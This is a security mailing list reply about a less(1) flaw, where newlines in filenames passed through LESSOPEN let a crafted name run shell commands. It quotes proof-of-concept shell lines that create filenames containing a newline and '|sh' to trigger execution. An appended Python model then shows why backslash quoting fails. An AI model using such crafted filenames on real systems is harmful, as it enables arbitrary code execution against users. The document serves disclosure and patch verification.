From: Sam James
Organization: Gentoo
To: oss-security@lists.openwall.com
Date: Fri, 12 Apr 2024 13:42:05 +0100
Message-ID: <87frvqvjky.fsf@gentoo.org>
In-Reply-To: <20240412122031.pt2sx6rasca3mgpu@jwilk.net> (Jakub Wilk's message of "Fri, 12 Apr 2024 14:20:31 +0200")
References: <20240412122031.pt2sx6rasca3mgpu@jwilk.net>
Subject: Re: [oss-security] less(1) with LESSOPEN mishandles \n in paths

Jakub Wilk writes:

> less(1) does not correctly escape newlines in pathnames when
> constructing the command line of the input preprocessor. If a user ran
> less(1) on files with untrusted names, this could result in execution
> of arbitrary code.
>
> The input preprocessor is enabled by the LESSOPEN environment variable.
> But if you didn't set it, don't worry, because zless(1) (or xzless(1),
> or zstdless(1)) sets it for you:
>
> $ echo 'cowsay pwned' > './\' && touch "$(printf '\n|sh')"
> $ zless ./*
>  _______
> < pwned >
>  -------
>         \   ^__^
>          \  (oo)\_______
>             (__)\       )\/\
>                 ||----w |
>                 ||     ||
> ./
> |sh (file 1 of 2) (END) - Next: ./\
>
> On Ubuntu systems, $LESSOPEN is set in ~/.bashrc by default, so the
> bug can be exploited even without the wrapper:
>

Unfortunately, it looks like we're the same in Gentoo.

> $ mkdir m "$(printf '\n|m')" && touch "$(printf '\n|m/oo')" && echo 'cowsay pwned' > m/oo && chmod +x m/oo
> $ less ./*/*
>  _______
> < pwned >
>  -------
>         \   ^__^
>          \  (oo)\_______
>             (__)\       )\/\
>                 ||----w |
>                 ||     ||
> ./
> |m/oo (file 1 of 2) (END) - Next: ./m/oo
>
> Upstream fix:
> https://github.com/gwsw/less/commit/007521ac3c95bc76

Thanks. Any idea if upstream plans to backport it? It doesn't apply
cleanly, I think, to the last release 643 (653 is a beta), but I'll try
to do it now.
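Added example (not code from less, from the advisory, or from this thread): a small Python model of why a newline in a pathname breaks a LESSOPEN-style command line. It assumes, as a simplification, that the pre-fix quoter prefixes each shell metacharacter with a backslash and that the metacharacter set below is representative; it does not reproduce less's own shell_quote(). A harmless Python one-liner that reports its argv stands in for the real preprocessor (e.g. gzip in zless), so running it only shows how sh parses the constructed command for a constructed name containing a newline, and that single-quoting (shlex.quote) keeps the name intact.

```python
"""Model of the LESSOPEN newline-quoting problem (added example, not less's code)."""
import json
import shlex
import subprocess
import sys

# Constructed sample name: a newline followed by "|sh", as produced by
# touch "$(printf '\n|sh')" in the advisory above.
EVIL_NAME = "./\n|sh"

# Assumed, simplified set of characters a backslash-escaping quoter would
# protect.  less reads its real list from LESSMETACHARS; this is only a model.
METACHARS = frozenset(" \t\n;|&<>()$`\\'\"*?[]#~=%")


def backslash_quote(name: str) -> str:
    """Prefix every metacharacter, newline included, with a backslash.

    Looks safe, but in POSIX sh a backslash followed by a newline is a line
    continuation, not an escaped newline: sh deletes the pair outright.
    """
    return "".join("\\" + c if c in METACHARS else c for c in name)


def backslash_quote_no_newline(name: str) -> str:
    """Same quoter, but newline is not treated as a metacharacter at all.

    The raw newline then terminates the command, and whatever follows it
    is parsed by sh as a second command line.
    """
    return "".join("\\" + c if c in METACHARS and c != "\n" else c for c in name)


def single_quote(name: str) -> str:
    """Wrap the name in single quotes (shlex.quote); a newline inside '...' is literal."""
    return shlex.quote(name)


def words_seen_by_sh(quoted: str) -> tuple[int, list[str]]:
    """Substitute the quoted name into a command template and let a real sh parse it.

    The stand-in preprocessor just prints its argv as JSON.  Returns
    (sh exit status, argv words the stand-in received on its first run).
    """
    stand_in = (shlex.quote(sys.executable)
                + " -c 'import sys, json; print(json.dumps(sys.argv[1:]))'")
    cmd = stand_in + " " + quoted  # like LESSOPEN's %s substitution
    proc = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    first_line = proc.stdout.split("\n", 1)[0]
    words = json.loads(first_line) if first_line else []
    return proc.returncode, words


def name_survives(name: str, quoter) -> bool:
    """True if sh hands the preprocessor exactly one argument equal to `name`."""
    status, words = words_seen_by_sh(quoter(name))
    return status == 0 and words == [name]


if __name__ == "__main__":
    for q in (backslash_quote_no_newline, backslash_quote, single_quote):
        status, words = words_seen_by_sh(q(EVIL_NAME))
        print(f"{q.__name__:27} exit={status:<3} argv={words!r} "
              f"intact={name_survives(EVIL_NAME, q)}")
```

With the backslash-only quoter the newline is swallowed by line continuation and the preprocessor receives `./|sh` rather than the real name; with no newline escaping at all, sh runs a second command line after the newline (here it merely fails with "not found"). Only the single-quoted form round-trips, which is the check a packager can repeat against a backported fix: substitute the real LESSOPEN template for the stand-in and confirm that names containing newlines arrive as a single argument.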